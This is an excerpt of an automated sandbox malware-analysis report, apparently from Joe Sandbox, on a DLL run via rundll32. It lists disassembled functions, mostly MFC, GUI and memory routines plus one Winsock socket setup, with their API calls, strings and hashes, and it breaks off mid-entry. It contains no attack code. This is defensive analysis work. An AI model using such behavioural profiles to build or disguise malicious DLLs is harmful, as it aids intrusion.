                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464918523.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464912255.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464976774.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464991878.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.465001079.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.465009024.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: AddressProc$HandleModule
                                                                                                                                    • String ID: ActivateActCtx$CreateActCtxA$DeactivateActCtx$KERNEL32$ReleaseActCtx
                                                                                                                                    • API String ID: 667068680-3617302793
                                                                                                                                    • Opcode ID: 70c6ef07d46d29c871f349003da5afecfc7d385a2253c1c7baa95387be190aff
                                                                                                                                    • Instruction ID: 377a8d7a9955057825aa4721d5912d38cb8da7d44d97b701af19917326088f09
                                                                                                                                    • Opcode Fuzzy Hash: 70c6ef07d46d29c871f349003da5afecfc7d385a2253c1c7baa95387be190aff
                                                                                                                                    • Instruction Fuzzy Hash: E711A0B1902766FFE710DF658CD040B7BE5E780256313023FF108CA422DA729884CB22
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 1001736E Relevance: 16.6, APIs: 11, Instructions: 139COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • __EH_prolog3_catch.LIBCMT ref: 10017375
                                                                                                                                    • FindResourceA.KERNEL32 ref: 100173A8
                                                                                                                                    • LoadResource.KERNEL32(?,00000000), ref: 100173B0
                                                                                                                                    • LockResource.KERNEL32(00000008,00000024,100010EC,00000000,10046640), ref: 100173C1
                                                                                                                                    • GetDesktopWindow.USER32 ref: 100173F4
                                                                                                                                    • IsWindowEnabled.USER32(000000FF), ref: 10017402
                                                                                                                                    • EnableWindow.USER32(000000FF,00000000), ref: 10017411
                                                                                                                                      • Part of subcall function 1001DEAF: IsWindowEnabled.USER32(?), ref: 1001DEB8
                                                                                                                                      • Part of subcall function 1001DECA: EnableWindow.USER32(?,10046640), ref: 1001DED7
                                                                                                                                    • EnableWindow.USER32(000000FF,00000001), ref: 100174ED
                                                                                                                                    • GetActiveWindow.USER32 ref: 100174F8
                                                                                                                                    • SetActiveWindow.USER32(000000FF), ref: 10017506
                                                                                                                                    • FreeResource.KERNEL32(00000008,?,00000024,100010EC,00000000,10046640), ref: 10017522
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464918523.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464912255.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464976774.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464991878.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.465001079.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.465009024.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Window$Resource$Enable$ActiveEnabled$DesktopFindFreeH_prolog3_catchLoadLock
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1509511306-0
                                                                                                                                    • Opcode ID: 8887fad69eff7dfeb0e1daad3ea1c484619822cd4cc789857992b00dd05f503d
                                                                                                                                    • Instruction ID: 24f9302adfe4a133b48f7954ad32019338b8f4d830f04ff5f1dc3598c8fc37ea
                                                                                                                                    • Opcode Fuzzy Hash: 8887fad69eff7dfeb0e1daad3ea1c484619822cd4cc789857992b00dd05f503d
                                                                                                                                    • Instruction Fuzzy Hash: 41519A34A00715DBDB11EFB4CD896AEBBF2FF48701F204129E506AA1A1DB74E9C1CB55
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 1001C7D1 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 90COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • __EH_prolog3_catch.LIBCMT ref: 1001C7D8
                                                                                                                                    • GetPropA.USER32(?,AfxOldWndProc423), ref: 1001C7E7
                                                                                                                                    • CallWindowProcA.USER32(?,?,00000110,?,00000000), ref: 1001C841
                                                                                                                                      • Part of subcall function 1001B617: GetWindowRect.USER32 ref: 1001B63F
                                                                                                                                      • Part of subcall function 1001B617: GetWindow.USER32(?,00000004), ref: 1001B65C
                                                                                                                                    • SetWindowLongA.USER32 ref: 1001C868
                                                                                                                                    • RemovePropA.USER32(?,AfxOldWndProc423), ref: 1001C870
                                                                                                                                    • GlobalFindAtomA.KERNEL32(AfxOldWndProc423), ref: 1001C877
                                                                                                                                    • GlobalDeleteAtom.KERNEL32(00000000), ref: 1001C87E
                                                                                                                                      • Part of subcall function 10019DB1: GetWindowRect.USER32 ref: 10019DBD
                                                                                                                                    • CallWindowProcA.USER32(?,?,?,?,00000000), ref: 1001C8D2
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464918523.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464912255.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464976774.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464991878.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.465001079.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.465009024.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Window$AtomCallGlobalProcPropRect$DeleteFindH_prolog3_catchLongRemove
                                                                                                                                    • String ID: AfxOldWndProc423
                                                                                                                                    • API String ID: 2702501687-1060338832
                                                                                                                                    • Opcode ID: a063fd3bf8fccbd5a0981dbc34fedfe81f848f8f936f79458706efa0baf70b36
                                                                                                                                    • Instruction ID: 2c86e32aa846b6cd4ed02fbbba056fe4065443c08480c9ca6c7694d446bc6c4a
                                                                                                                                    • Opcode Fuzzy Hash: a063fd3bf8fccbd5a0981dbc34fedfe81f848f8f936f79458706efa0baf70b36
                                                                                                                                    • Instruction Fuzzy Hash: D931417680011AEBDF06DFA4CD89DFF7AB8EF0A311F004124F611AA061DB79D9919B65
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 10012E90 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 81networkCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 1001E3AC: __EH_prolog3.LIBCMT ref: 1001E3B3
                                                                                                                                      • Part of subcall function 1001E3AC: GetWindowTextA.USER32(?,?,?), ref: 1001E3C9
                                                                                                                                    • inet_addr.WS2_32(?), ref: 10012ECA
                                                                                                                                    • htons.WS2_32(00001C1F), ref: 10012EF0
                                                                                                                                      • Part of subcall function 1001C0D4: GetWindowTextLengthA.USER32 ref: 1001C0E0
                                                                                                                                      • Part of subcall function 1001C0D4: GetWindowTextA.USER32(?,00000000,00000000), ref: 1001C0F8
                                                                                                                                    • WSAStartup.WS2_32(00000202,?), ref: 10012F58
                                                                                                                                    • _printf.LIBCMT ref: 10012F79
                                                                                                                                    • socket.WS2_32(00000002,00000001,00000006), ref: 10012F87
                                                                                                                                    • WSACleanup.WS2_32 ref: 10012FB6
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464918523.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464912255.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464976774.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464991878.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.465001079.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.465009024.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: TextWindow$CleanupH_prolog3LengthStartup_printfhtonsinet_addrsocket
                                                                                                                                    • String ID: Please enter your name$WSAStartup function failed with error: %d$error
                                                                                                                                    • API String ID: 4222005279-2156106531
                                                                                                                                    • Opcode ID: 67037696b88feaf8089c85546bf0036186714c2ea7473beb98d4f0a5558571d4
                                                                                                                                    • Instruction ID: 3737c0697f466a88bc0bbe9275da51ac62ffde411ffa2b98b4ee14bbe11db7c9
                                                                                                                                    • Opcode Fuzzy Hash: 67037696b88feaf8089c85546bf0036186714c2ea7473beb98d4f0a5558571d4
                                                                                                                                    • Instruction Fuzzy Hash: 6A317174A85218DBE724DB90CD66FD9B3B1EF48300F1041E8E609AA2C2DB72E9C18F55
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 100351B5 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 46libraryloaderCOMMONLIBRARYCODE
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • GetModuleHandleA.KERNEL32(KERNEL32.DLL,10050C40,0000000C,100352C7,00000000,00000000,?,1003580D,?,00000001,00000001,10035A23,00000018,10050CC8,0000000C,10035AB2), ref: 100351C6
                                                                                                                                    • GetProcAddress.KERNEL32(00000000,EncodePointer,?,1003580D,?,00000001,00000001,10035A23,00000018,10050CC8,0000000C,10035AB2,00000001,00000001,?,10035387), ref: 100351EF
                                                                                                                                    • GetProcAddress.KERNEL32(?,DecodePointer,?,1003580D,?,00000001,00000001,10035A23,00000018,10050CC8,0000000C,10035AB2,00000001,00000001,?,10035387), ref: 100351FF
                                                                                                                                    • InterlockedIncrement.KERNEL32(10054D18), ref: 10035221
                                                                                                                                    • __lock.LIBCMT ref: 10035229
                                                                                                                                    • ___addlocaleref.LIBCMT ref: 10035248
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464918523.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464912255.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464976774.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464991878.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.465001079.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.465009024.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: AddressProc$HandleIncrementInterlockedModule___addlocaleref__lock
                                                                                                                                    • String ID: DecodePointer$EncodePointer$KERNEL32.DLL
                                                                                                                                    • API String ID: 1036688887-2843748187
                                                                                                                                    • Opcode ID: d574a0f1000a19323f7053aa8cd70e6a5049edfe48066084e54d0a0798c8c5f6
                                                                                                                                    • Instruction ID: b318c4b35d3b307acbdb6d10fcd30e50ea36946f4a8ba2e6b5da3482df9394b6
                                                                                                                                    • Opcode Fuzzy Hash: d574a0f1000a19323f7053aa8cd70e6a5049edfe48066084e54d0a0798c8c5f6
                                                                                                                                    • Instruction Fuzzy Hash: B811ACB0801B01AFE721CF79CC80B9ABBE0EF05302F104529E49ADB261DB75A900CF15
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 1001717E Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 158COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • __EH_prolog3_catch.LIBCMT ref: 10017185
                                                                                                                                    • GetSystemMetrics.USER32 ref: 10017236
                                                                                                                                    • GlobalLock.KERNEL32 ref: 1001729F
                                                                                                                                    • CreateDialogIndirectParamA.USER32(?,?,?,10016BDA,00000000), ref: 100172CE
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464918523.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464912255.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464976774.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464991878.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.465001079.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.465009024.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CreateDialogGlobalH_prolog3_catchIndirectLockMetricsParamSystem
                                                                                                                                    • String ID: MS Shell Dlg
                                                                                                                                    • API String ID: 1736106359-76309092
                                                                                                                                    • Opcode ID: ce3ca581592317389ef65e808fedc345d4d6962fe5f5f1ce60146464d019ac3a
                                                                                                                                    • Instruction ID: d5dd74ac162ff8de1123455b698b8f5e71fb740695f122bac0aed726529ed5a4
                                                                                                                                    • Opcode Fuzzy Hash: ce3ca581592317389ef65e808fedc345d4d6962fe5f5f1ce60146464d019ac3a
                                                                                                                                    • Instruction Fuzzy Hash: 4D51CC34900215EBCB05DFA8CC859EEBBB5FF44340F254659F85AEB292DB30DA81CB91
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 10021ED7 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 63COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • GetStockObject.GDI32(00000011), ref: 10021EFD
                                                                                                                                    • GetStockObject.GDI32(0000000D), ref: 10021F05
                                                                                                                                    • GetObjectA.GDI32(00000000,0000003C,?), ref: 10021F12
                                                                                                                                    • GetDC.USER32(00000000), ref: 10021F21
                                                                                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 10021F35
                                                                                                                                    • MulDiv.KERNEL32 ref: 10021F41
                                                                                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 10021F4D
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464918523.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464912255.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464976774.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464991878.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.465001079.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.465009024.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Object$Stock$CapsDeviceRelease
                                                                                                                                    • String ID: System
                                                                                                                                    • API String ID: 46613423-3470857405
                                                                                                                                    • Opcode ID: 4af17c4c8fdd97dc95f0f93d77672d7bd64c29950e8ea380bbe0e81d253d6bc4
                                                                                                                                    • Instruction ID: 373189280b20a42e9b8e0e5153e2554ccb1f78fece54ef70e8a9f21809c5893c
                                                                                                                                    • Opcode Fuzzy Hash: 4af17c4c8fdd97dc95f0f93d77672d7bd64c29950e8ea380bbe0e81d253d6bc4
                                                                                                                                    • Instruction Fuzzy Hash: 65119175640268EBEB10DBA0DE85FEF77B8EF19781F800025FA05E6181EB709D05CB65
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 100209ED Relevance: 13.6, APIs: 9, Instructions: 96memoryCOMMONLIBRARYCODE
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • __EH_prolog3_catch.LIBCMT ref: 100209F4
                                                                                                                                    • EnterCriticalSection.KERNEL32(?,00000010,10020CA6,?,00000000,?,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004,10001031), ref: 10020A05
                                                                                                                                    • TlsGetValue.KERNEL32 ref: 10020A23
                                                                                                                                    • LocalAlloc.KERNEL32(00000000,00000000,00000000,00000010,?,?,00000000,?,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139), ref: 10020A57
                                                                                                                                    • LeaveCriticalSection.KERNEL32(?,?,?,00000000,?,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004,10001031,00000000), ref: 10020AC3
                                                                                                                                    • _memset.LIBCMT ref: 10020AE2
                                                                                                                                    • TlsSetValue.KERNEL32(?,00000000), ref: 10020AF3
                                                                                                                                    • LeaveCriticalSection.KERNEL32(?,?,00000000,?,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004,10001031,00000000), ref: 10020B14
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464918523.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464912255.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464976774.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464991878.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.465001079.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.465009024.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CriticalSection$LeaveValue$AllocEnterH_prolog3_catchLocal_memset
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1891723912-0
                                                                                                                                    • Opcode ID: c202fd39cbfffff3bf24e4dfcb1fdac57d085034b58585143c8170edaa30a227
                                                                                                                                    • Instruction ID: bbf58174ed8a80918add6c1c4d28f9e8b2dc0fc786f447701b2046db94720ece
                                                                                                                                    • Opcode Fuzzy Hash: c202fd39cbfffff3bf24e4dfcb1fdac57d085034b58585143c8170edaa30a227
                                                                                                                                    • Instruction Fuzzy Hash: F2319874500716EFD720DF10EC85D5EBBA2EF04310BA1C529F91A9A662DB30B990CB81
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 10025BA5 Relevance: 12.3, APIs: 8, Instructions: 297memoryCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • __EH_prolog3.LIBCMT ref: 10025BAC
                                                                                                                                      • Part of subcall function 1002426A: SysStringLen.OLEAUT32(?), ref: 10024272
                                                                                                                                      • Part of subcall function 1002426A: CoGetClassObject.OLE32(?,?,00000000,1004B62C,?), ref: 10024290
                                                                                                                                    • CreateILockBytesOnHGlobal.OLE32(00000000,00000001,?), ref: 10025D36
                                                                                                                                    • StgCreateDocfileOnILockBytes.OLE32(?,00001012,00000000,?), ref: 10025D57
                                                                                                                                    • GlobalAlloc.KERNEL32(00000000,00000000), ref: 10025DA4
                                                                                                                                    • GlobalLock.KERNEL32 ref: 10025DB2
                                                                                                                                    • GlobalUnlock.KERNEL32(?), ref: 10025DCA
                                                                                                                                    • CreateILockBytesOnHGlobal.OLE32(8007000E,00000001,?), ref: 10025DED
                                                                                                                                    • StgOpenStorageOnILockBytes.OLE32(?,00000000,00000012,00000000,00000000,?), ref: 10025E09
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464918523.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464912255.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464976774.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464991878.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.465001079.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.465009024.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: GlobalLock$Bytes$Create$AllocClassDocfileH_prolog3ObjectOpenStorageStringUnlock
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 317715441-0
                                                                                                                                    • Opcode ID: 2828fa5d641ff44e81fbef86681a6654b74232d6680dac4ff27e1d2418666a7c
                                                                                                                                    • Instruction ID: 6b32e8b7721f49624c611e5d3fbfac2c00c012c139a68ad78311da97252ee3f4
                                                                                                                                    • Opcode Fuzzy Hash: 2828fa5d641ff44e81fbef86681a6654b74232d6680dac4ff27e1d2418666a7c
                                                                                                                                    • Instruction Fuzzy Hash: BCC12BB090024AEFCF14DFA4DC889AEB7B9FF48341BA14929F916DB251D7719A40CB64
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 10014A22 Relevance: 12.1, APIs: 8, Instructions: 65memorystringCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • GlobalLock.KERNEL32 ref: 10014A3F
                                                                                                                                    • lstrcmpA.KERNEL32(?,?), ref: 10014A4B
                                                                                                                                    • OpenPrinterA.WINSPOOL.DRV(?,?,00000000), ref: 10014A5D
                                                                                                                                    • DocumentPropertiesA.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 10014A7D
                                                                                                                                    • GlobalAlloc.KERNEL32(00000042,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 10014A85
                                                                                                                                    • GlobalLock.KERNEL32 ref: 10014A8F
                                                                                                                                    • DocumentPropertiesA.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000002), ref: 10014A9C
                                                                                                                                    • ClosePrinter.WINSPOOL.DRV(?,00000000,?,?,00000000,00000000,00000002), ref: 10014AB4
                                                                                                                                      • Part of subcall function 10020495: GlobalFlags.KERNEL32(?), ref: 100204A0
                                                                                                                                      • Part of subcall function 10020495: GlobalUnlock.KERNEL32(?,?,?,10014801,?,00000004,1000116F,?,?,1000113F), ref: 100204B2
                                                                                                                                      • Part of subcall function 10020495: GlobalFree.KERNEL32(?), ref: 100204BD
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464918523.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464912255.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464976774.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464991878.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.465001079.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.465009024.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Global$DocumentLockProperties$AllocCloseFlagsFreeOpenPrinterPrinter.Unlocklstrcmp
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 168474834-0
                                                                                                                                    • Opcode ID: 682e8427e4eae8e26461a3ae413d84982b563dbbe5be57b0626e4beef210c331
                                                                                                                                    • Instruction ID: 20fc1444fe35ab48259a21c9388e4acfe4ba196ce7874d1294122afbb026df8a
                                                                                                                                    • Opcode Fuzzy Hash: 682e8427e4eae8e26461a3ae413d84982b563dbbe5be57b0626e4beef210c331
                                                                                                                                    • Instruction Fuzzy Hash: 5111CAB6500604BBDB22DFA6CD89C6FBBEDEF897407514029FA01C6121DA31E940D728
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 10020F2E Relevance: 12.0, APIs: 8, Instructions: 38COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • GetSystemMetrics.USER32 ref: 10020F3B
                                                                                                                                    • GetSystemMetrics.USER32 ref: 10020F42
                                                                                                                                    • GetSystemMetrics.USER32 ref: 10020F49
                                                                                                                                    • GetSystemMetrics.USER32 ref: 10020F53
                                                                                                                                    • GetDC.USER32(00000000), ref: 10020F5D
                                                                                                                                    • GetDeviceCaps.GDI32(00000000,00000058), ref: 10020F6E
                                                                                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 10020F76
                                                                                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 10020F7E
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464918523.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464912255.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464976774.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464991878.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.465001079.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.465009024.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MetricsSystem$CapsDevice$Release
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1151147025-0
                                                                                                                                    • Opcode ID: cd0d00d3bf09b09063c79ec0fd26ae0b7f2f0b754747fdae3c9245efa7409752
                                                                                                                                    • Instruction ID: 9c0db37145597a9d8002a30536ddf2583a3ab63f37cab70819204e46a6a6359b
                                                                                                                                    • Opcode Fuzzy Hash: cd0d00d3bf09b09063c79ec0fd26ae0b7f2f0b754747fdae3c9245efa7409752
                                                                                                                                    • Instruction Fuzzy Hash: 84F09670A40714AEF7206F718D8DF277BA4EBC6B51F01442AE611CB2D0D6B598018F50
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 1001820B Relevance: 10.8, APIs: 7, Instructions: 255memoryCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • __EH_prolog3.LIBCMT ref: 10018224
                                                                                                                                    • MapDialogRect.USER32(?,00000000), ref: 100182B5
                                                                                                                                    • SysAllocStringLen.OLEAUT32(?,?), ref: 100182D4
